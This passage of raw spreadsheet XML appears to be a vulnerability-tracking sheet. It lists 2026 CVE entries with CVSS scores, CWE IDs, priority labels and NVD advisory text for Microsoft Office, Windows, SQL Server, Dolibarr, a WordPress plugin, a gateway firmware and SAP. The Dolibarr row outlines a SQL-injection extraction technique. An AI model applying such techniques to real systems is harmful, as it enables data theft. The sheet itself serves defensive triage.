t="inlineStr"><is><t>CVE-2026-71510</t></is></c><c r="D1658" s="5" t="n"><v>6.5</v></c><c r="E1658" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1658" s="5" t="inlineStr" /><c r="H1658" s="5" t="n"><v>0.002</v></c><c r="I1658" s="5" t="inlineStr" /><c r="J1658" s="5" t="inlineStr" /><c r="K1658" s="5" t="inlineStr" /><c r="L1658" s="5" t="inlineStr" /><c r="M1658" s="5" t="inlineStr" /><c r="N1658" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1658" s="5" t="inlineStr"><is><t>2026-08-24</t></is></c><c r="P1658" s="5" t="inlineStr" /><c r="Q1658" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="R1658" s="5" t="inlineStr"><is><t>Dolibarr before 24.0.0 contains a SQL injection vulnerability in the users REST API that allows authenticated attackers with user-read rights to extract sensitive data by splicing unsanitized filter parameters into SQL WHERE clauses without column restrictions. Attackers can perform binary search on numeric fields and LIKE prefix iteration on string fields to recover salary figures and password verifiers omitted from normal API responses, while raw database error messages in the same endpoint enable column name enumeration.</t></is></c><c r="S1658" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71510</t></is></c></row><row r="1659"><c r="A1659" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1659" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1659" s="5" t="inlineStr"><is><t>CVE-2026-72938</t></is></c><c r="D1659" s="5" t="n"><v>6.5</v></c><c r="E1659" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1659" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1659" s="5" t="inlineStr" /><c r="H1659" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1659" s="5" t="inlineStr" /><c r="J1659" s="5" t="inlineStr" /><c r="K1659" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1659" s="5" t="inlineStr" /><c r="M1659" s="5" t="inlineStr" /><c r="N1659" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1659" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1659" s="5" t="inlineStr" /><c r="Q1659" s="5" t="inlineStr"><is><t>CWE-822, CWE-843</t></is></c><c r="R1659" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1659" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72938</t></is></c></row><row r="1660"><c r="A1660" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1660" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1660" s="5" t="inlineStr"><is><t>CVE-2026-72939</t></is></c><c r="D1660" s="5" t="n"><v>6.5</v></c><c r="E1660" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1660" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1660" s="5" t="inlineStr" /><c r="H1660" s="5" t="n"><v>0.011</v></c><c r="I1660" s="5" t="inlineStr" /><c r="J1660" s="5" t="inlineStr" /><c r="K1660" s="5" t="inlineStr" /><c r="L1660" s="5" t="inlineStr" /><c r="M1660" s="5" t="inlineStr" /><c r="N1660" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1660" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1660" s="5" t="inlineStr" /><c r="Q1660" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1660" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Routing and Remote Access Service (RRAS) allows an authorized attacker to deny service over a network.</t></is></c><c r="S1660" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72939</t></is></c></row><row r="1661"><c r="A1661" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1661" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1661" s="5" t="inlineStr"><is><t>CVE-2026-72942</t></is></c><c r="D1661" s="5" t="n"><v>6.5</v></c><c r="E1661" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1661" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1661" s="5" t="inlineStr" /><c r="H1661" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1661" s="5" t="inlineStr" /><c r="J1661" s="5" t="inlineStr" /><c r="K1661" s="5" t="inlineStr" /><c r="L1661" s="5" t="inlineStr" /><c r="M1661" s="5" t="inlineStr" /><c r="N1661" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1661" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1661" s="5" t="inlineStr" /><c r="Q1661" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1661" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Spaceport.sys allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1661" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72942</t></is></c></row><row r="1662"><c r="A1662" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1662" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1662" s="5" t="inlineStr"><is><t>CVE-2026-72956</t></is></c><c r="D1662" s="5" t="n"><v>6.5</v></c><c r="E1662" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1662" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1662" s="5" t="inlineStr" /><c r="H1662" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1662" s="5" t="inlineStr" /><c r="J1662" s="5" t="inlineStr" /><c r="K1662" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1662" s="5" t="inlineStr" /><c r="M1662" s="5" t="inlineStr" /><c r="N1662" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1662" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1662" s="5" t="inlineStr" /><c r="Q1662" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R1662" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1662" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72956</t></is></c></row><row r="1663"><c r="A1663" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1663" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1663" s="5" t="inlineStr"><is><t>CVE-2026-72974</t></is></c><c r="D1663" s="5" t="n"><v>6.5</v></c><c r="E1663" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1663" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1663" s="5" t="inlineStr" /><c r="H1663" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1663" s="5" t="inlineStr" /><c r="J1663" s="5" t="inlineStr" /><c r="K1663" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1663" s="5" t="inlineStr" /><c r="M1663" s="5" t="inlineStr" /><c r="N1663" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1663" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1663" s="5" t="inlineStr" /><c r="Q1663" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1663" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1663" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72974</t></is></c></row><row r="1664"><c r="A1664" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1664" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1664" s="5" t="inlineStr"><is><t>CVE-2026-72975</t></is></c><c r="D1664" s="5" t="n"><v>6.5</v></c><c r="E1664" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1664" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1664" s="5" t="inlineStr" /><c r="H1664" s="5" t="n"><v>0.007</v></c><c r="I1664" s="5" t="inlineStr" /><c r="J1664" s="5" t="inlineStr" /><c r="K1664" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1664" s="5" t="inlineStr" /><c r="M1664" s="5" t="inlineStr" /><c r="N1664" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1664" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1664" s="5" t="inlineStr" /><c r="Q1664" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1664" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1664" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72975</t></is></c></row><row r="1665"><c r="A1665" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1665" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1665" s="5" t="inlineStr"><is><t>CVE-2026-72977</t></is></c><c r="D1665" s="5" t="n"><v>6.5</v></c><c r="E1665" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1665" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1665" s="5" t="inlineStr" /><c r="H1665" s="5" t="n"><v>0.01</v></c><c r="I1665" s="5" t="inlineStr" /><c r="J1665" s="5" t="inlineStr" /><c r="K1665" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t></is></c><c r="L1665" s="5" t="inlineStr" /><c r="M1665" s="5" t="inlineStr" /><c r="N1665" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1665" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1665" s="5" t="inlineStr" /><c r="Q1665" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="R1665" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1665" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72977</t></is></c></row><row r="1666"><c r="A1666" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1666" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1666" s="5" t="inlineStr"><is><t>CVE-2026-73029</t></is></c><c r="D1666" s="5" t="n"><v>6.5</v></c><c r="E1666" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1666" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1666" s="5" t="inlineStr" /><c r="H1666" s="5" t="n"><v>0.007</v></c><c r="I1666" s="5" t="inlineStr" /><c r="J1666" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K1666" s="5" t="inlineStr"><is><t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L1666" s="5" t="inlineStr" /><c r="M1666" s="5" t="inlineStr" /><c r="N1666" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1666" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1666" s="5" t="inlineStr" /><c r="Q1666" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="R1666" s="5" t="inlineStr"><is><t>Buffer over-read in SQL Server allows an authorized attacker to disclose information over a network.</t></is></c><c r="S1666" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73029</t></is></c></row><row r="1667"><c r="A1667" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1667" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1667" s="5" t="inlineStr"><is><t>CVE-2026-75132</t></is></c><c r="D1667" s="5" t="n"><v>6.5</v></c><c r="E1667" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1667" s="5" t="inlineStr" /><c r="H1667" s="5" t="n"><v>0.003</v></c><c r="I1667" s="5" t="inlineStr" /><c r="J1667" s="5" t="inlineStr"><is><t>postgresql</t></is></c><c r="K1667" s="5" t="inlineStr" /><c r="L1667" s="5" t="inlineStr" /><c r="M1667" s="5" t="inlineStr" /><c r="N1667" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1667" s="5" t="inlineStr"><is><t>2026-08-31</t></is></c><c r="P1667" s="5" t="inlineStr" /><c r="Q1667" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="R1667" s="5" t="inlineStr"><is><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is></c><c r="S1667" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75132</t></is></c></row><row r="1668"><c r="A1668" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1668" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1668" s="5" t="inlineStr"><is><t>CVE-2026-75163</t></is></c><c r="D1668" s="5" t="n"><v>6.5</v></c><c r="E1668" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1668" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1668" s="5" t="inlineStr" /><c r="H1668" s="5" t="n"><v>0.003</v></c><c r="I1668" s="5" t="inlineStr" /><c r="J1668" s="5" t="inlineStr" /><c r="K1668" s="5" t="inlineStr" /><c r="L1668" s="5" t="inlineStr" /><c r="M1668" s="5" t="inlineStr" /><c r="N1668" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1668" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1668" s="5" t="inlineStr" /><c r="Q1668" s="5" t="inlineStr"><is><t>CWE-200</t></is></c><c r="R1668" s="5" t="inlineStr"><is><t>An information disclosure vulnerability in the ugw-deviceinfo method of /cgi-bin/wwwugw.cgi in MBS-Solutions X-Serie Gateway firmware V6_00_05 returns detailed system version fields (operatingsystem, gatewayversion) to any authenticated user, including users with the low-privileged Standard role.</t></is></c><c r="S1668" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75163</t></is></c></row><row r="1669"><c r="A1669" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1669" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1669" s="5" t="inlineStr"><is><t>CVE-2026-75164</t></is></c><c r="D1669" s="5" t="n"><v>6.5</v></c><c r="E1669" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1669" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1669" s="5" t="inlineStr" /><c r="H1669" s="5" t="n"><v>0.004</v></c><c r="I1669" s="5" t="inlineStr" /><c r="J1669" s="5" t="inlineStr" /><c r="K1669" s="5" t="inlineStr" /><c r="L1669" s="5" t="inlineStr" /><c r="M1669" s="5" t="inlineStr" /><c r="N1669" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1669" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1669" s="5" t="inlineStr" /><c r="Q1669" s="5" t="inlineStr"><is><t>CWE-552</t></is></c><c r="R1669" s="5" t="inlineStr"><is><t>An arbitrary file read vulnerability in /cgi-bin/ugwdownload.cgi of MBS-Solutions X-Serie Gateway firmware V6_00_05 allows a remote authenticated user with the low-privileged Standard role to retrieve arbitrary files from the device filesystem via the file query string parameter.</t></is></c><c r="S1669" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75164</t></is></c></row><row r="1670"><c r="A1670" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1670" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1670" s="5" t="inlineStr"><is><t>CVE-2026-75793</t></is></c><c r="D1670" s="5" t="n"><v>6.5</v></c><c r="E1670" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1670" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1670" s="5" t="inlineStr" /><c r="H1670" s="5" t="n"><v>0.002</v></c><c r="I1670" s="5" t="inlineStr" /><c r="J1670" s="5" t="inlineStr" /><c r="K1670" s="5" t="inlineStr" /><c r="L1670" s="5" t="inlineStr" /><c r="M1670" s="5" t="inlineStr" /><c r="N1670" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1670" s="5" t="inlineStr"><is><t>2026-09-06</t></is></c><c r="P1670" s="5" t="inlineStr" /><c r="Q1670" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="R1670" s="5" t="inlineStr"><is><t>The SureCart  WordPress plugin before 4.7.0 does not consult the site's user registration setting before creating WordPress accounts, allowing unauthenticated users to create an account and receive a logged-in session even when registration is disabled.</t></is></c><c r="S1670" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75793</t></is></c></row><row r="1671"><c r="A1671" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1671" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1671" s="5" t="inlineStr"><is><t>CVE-2026-76000</t></is></c><c r="D1671" s="5" t="n"><v>6.5</v></c><c r="E1671" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1671" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1671" s="5" t="inlineStr" /><c r="H1671" s="5" t="n"><v>0.003</v></c><c r="I1671" s="5" t="inlineStr" /><c r="J1671" s="5" t="inlineStr" /><c r="K1671" s="5" t="inlineStr" /><c r="L1671" s="5" t="inlineStr" /><c r="M1671" s="5" t="inlineStr" /><c r="N1671" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1671" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1671" s="5" t="inlineStr" /><c r="Q1671" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="R1671" s="5" t="inlineStr"><is><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is></c><c r="S1671" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76000</t></is></c></row><row r="1672"><c r="A1672" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1672" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1672" s="5" t="inlineStr"><is><t>CVE-2026-76968</t></is></c><c r="D1672" s="5" t="n"><v>6.5</v></c><c r="E1672" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1672" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1672" s="5" t="inlineStr" /><c r="H1672" s="5" t="n"><v>0.002</v></c><c r="I1672" s="5" t="inlineStr" /><c r="J1672" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1672" s="5" t="inlineStr" /><c r="L1672" s="5" t="inlineStr" /><c r="M1672" s="5" t="inlineStr" /><c r="N1672" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1672" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1672" s="5" t="inlineStr" /><c r="Q1672" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="R1672" s="5" t="inlineStr"><is><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is></c><c r="S1672" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76968</t></is></c></row><row r="1673"><c r="A1673" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1673" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1673" s="5" t="inlineStr"><is><t>CVE-2026-76971</t></is></c><c r="D1673" s="5" t="n"><v>6.5</v></c><c r="E1673" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1673" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G1673" s="5" t="inlineStr" /><c r="H1673" s="5" t="n"><v>0.001</v></c><c r="I1673" s="5" t="inlineStr" /><c r="J1673" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K1673" s="5" t="inlineStr" /><c r="L1673" s="5" t="inlineStr" /><c r="M1673" s="5" t="inlineStr" /><c r="N1673" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1673" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1673" s="5" t="inlineStr" /><c r="Q1673" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="R1673" s="5" t="inlineStr"><is><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is></c><c r="S1673" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76971</t></is></c></row><row r="1674"><c r="A1674" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1674" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1674" s="5" t="inlineStr"><is><t>CVE-2026-77896</t></is></c><c r="D1674" s="5" t="n"><v>6.5</v></c><c r="E1674" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1674" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1674" s="5" t="inlineStr" /><c r="H1674" s="5" t="n"><v>0.007</v></c><c r="I1674" s="5" t="inlineStr" /><c r="J1674" s="5" t="inlineStr" /><c r="K1674" s="5" t="inlineStr" /><c r="L1674" s="5" t="inlineStr" /><c r="M1674" s="5" t="inlineStr" /><c r="N1674" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1674" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1674" s="5" t="inlineStr" /><c r="Q1674" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1674" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Remote Desktop Client allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1674" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77896</t></is></c></row><row r="1675"><c r="A1675" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1675" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1675" s="5" t="inlineStr"><is><t>CVE-2026-77911</t></is></c><c r="D1675" s="5" t="n"><v>6.5</v></c><c r="E1675" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1675" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1675" s="5" t="inlineStr" /><c r="H1675" s="5" t="n"><v>0.007</v></c><c r="I1675" s="5" t="inlineStr" /><c r="J1675" s="5" t="inlineStr" /><c r="K1675" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1675" s="5" t="inlineStr" /><c r="M1675" s="5" t="inlineStr" /><c r="N1675" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1675" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1675" s="5" t="inlineStr" /><c r="Q1675" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1675" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1675" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77911</t></is></c></row><row r="1676"><c r="A1676" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1676" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1676" s="5" t="inlineStr"><is><t>CVE-2026-78441</t></is></c><c r="D1676" s="5" t="n"><v>6.5</v></c><c r="E1676" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1676" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1676" s="5" t="inlineStr" /><c r="H1676" s="5" t="n"><v>0.007</v></c><c r="I1676" s="5" t="inlineStr" /><c r="J1676" s="5" t="inlineStr" /><c r="K1676" s="5" t="inlineStr" /><c r="L1676" s="5" t="inlineStr" /><c r="M1676" s="5" t="inlineStr" /><c r="N1676" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1676" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1676" s="5" t="inlineStr" /><c r="Q1676" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1676" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows OLE DB allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1676" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78441</t></is></c></row><row r="1677"><c r="A1677" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1677" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1677" s="5" t="inlineStr"><is><t>CVE-2026-78453</t></is></c><c r="D1677" s="5" t="n"><v>6.5</v></c><c r="E1677" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1677" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1677" s="5" t="inlineStr" /><c r="H1677" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1677" s="5" t="inlineStr" /><c r="J1677" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K167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677" s="5" t="inlineStr" /><c r="M1677" s="5" t="inlineStr" /><c r="N1677" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1677" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1677" s="5" t="inlineStr" /><c r="Q1677" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R1677" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Windows SCSI Class System File allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1677" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78453</t></is></c></row><row r="1678"><c r="A1678" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1678" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1678" s="5" t="inlineStr"><is><t>CVE-2026-78502</t></is></c><c r="D1678" s="5" t="n"><v>6.5</v></c><c r="E1678" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1678" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1678" s="5" t="inlineStr" /><c r="H1678" s="5" t="n"><v>0.007</v></c><c r="I1678" s="5" t="inlineStr" /><c r="J1678" s="5" t="inlineStr" /><c r="K1678" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1678" s="5" t="inlineStr" /><c r="M1678" s="5" t="inlineStr" /><c r="N1678" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1678" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1678" s="5" t="inlineStr" /><c r="Q1678" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1678" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1678" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78502</t></is></c></row><row r="1679"><c r="A1679" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1679" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1679" s="5" t="inlineStr"><is><t>CVE-2026-78503</t></is></c><c r="D1679" s="5" t="n"><v>6.5</v></c><c r="E1679" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1679" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1679" s="5" t="inlineStr" /><c r="H1679" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1679" s="5" t="inlineStr" /><c r="J1679" s="5" t="inlineStr" /><c r="K1679" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t></is></c><c r="L1679" s="5" t="inlineStr" /><c r="M1679" s="5" t="inlineStr" /><c r="N1679" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1679" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1679" s="5" t="inlineStr" /><c r="Q1679" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1679" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Word allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1679" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78503</t></is></c></row><row r="1680"><c r="A1680" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1680" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1680" s="5" t="inlineStr"><is><t>CVE-2026-78515</t></is></c><c r="D1680" s="5" t="n"><v>6.5</v></c><c r="E1680" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1680" 